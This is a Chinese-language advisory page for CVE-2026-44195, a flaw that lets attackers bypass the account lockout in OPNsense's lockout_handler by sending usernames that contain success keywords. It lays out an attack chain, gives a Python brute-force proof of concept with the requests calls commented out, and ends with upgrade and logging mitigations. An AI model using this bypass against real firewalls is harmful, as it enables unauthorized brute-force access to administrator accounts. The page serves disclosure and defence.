CVE-2026-44195 CVSS 5.3 中危

CVE-2026-44195 OPNsense认证绕过漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44195

漏洞类型

认证绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OPNsense

漏洞概述

OPNsense是基于FreeBSD的开源防火墙和路由平台。在26.1.7版本之前，其lockout_handler组件存在逻辑缺陷。未经身份验证的攻击者可以通过在暴力破解尝试中插入包含特定成功关键字的用户名，重置认证失败计数器，从而有效绕过账户锁定策略并持续进行暴力破解攻击。

技术细节

该漏洞的核心在于OPNsense防火墙的`lockout_handler`在解析日志时的逻辑缺陷。系统通过追踪认证失败次数来锁定攻击者IP，但解析器未能有效区分真实的成功登录与包含特定关键字的恶意用户名。攻击者可以编写脚本，在常规的暴力破解尝试中穿插发送包含“Accepted”或“Successful login”字符串的用户名。当系统检测到这些关键字时，会误判为登录成功并重置该IP地址的失败计数器。通过这种方式，攻击者可以防止计数器达到预设的锁定阈值，从而完全绕过账户锁定保护机制，实现对目标账户的无限制暴力破解攻击。

攻击链分析

STEP 1

侦察

攻击者识别目标为OPNsense防火墙，确认其版本低于26.1.7。

STEP 2

构造Payload

攻击者准备包含“Accepted”或“Successful login”等关键字的特殊用户名字符串。

STEP 3

发送认证请求

攻击者向登录接口发送请求，尝试猜测密码。

STEP 4

重置计数器

攻击者穿插发送包含特殊关键字的用户名，触发lockout_handler的逻辑缺陷，重置IP的失败计数器。

STEP 5

维持暴力破解

由于失败计数器被不断重置，攻击者可以无限期地进行暴力破解尝试而不会被锁定。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "https://<opnsense-ip>/index.php"
username_target = "admin"

# Keywords that trigger the counter reset based on the vulnerability description
bypass_keywords = ["Accepted", "Successful login"]

# Payload list including normal passwords and bypass attempts
passwords = ["123456", "admin", "password", "root"]

def exploit():
    for pwd in passwords:
        # Step 1: Attempt normal brute force
        data = {'user': username_target, 'password': pwd}
        # r = requests.post(target_url, data=data) # Actual request
        print(f"[+] Trying password: {pwd}")

        # Step 2: Inject crafted username to reset lockout counter
        # The logic flaw resets the counter if the log line contains success keywords
        for keyword in bypass_keywords:
            bypass_user = f"test \"{keyword}\""
            bypass_data = {'user': bypass_user, 'password': 'irrelevant'}
            # r = requests.post(target_url, data=bypass_data) # Actual request
            print(f"[*] Sending bypass payload with keyword: {keyword}")

if __name__ == "__main__":
    exploit()

影响范围

OPNsense < 26.1.7

防御指南

临时缓解措施

建议立即升级至26.1.7或更高版本以修复此漏洞。若无法立即升级，应密切关注系统认证日志，查找包含“Accepted”或“Successful login”等关键字但实际并未成功的异常登录尝试，并在防火墙或WAF层面配置规则，拦截包含此类关键字注入的用户名请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表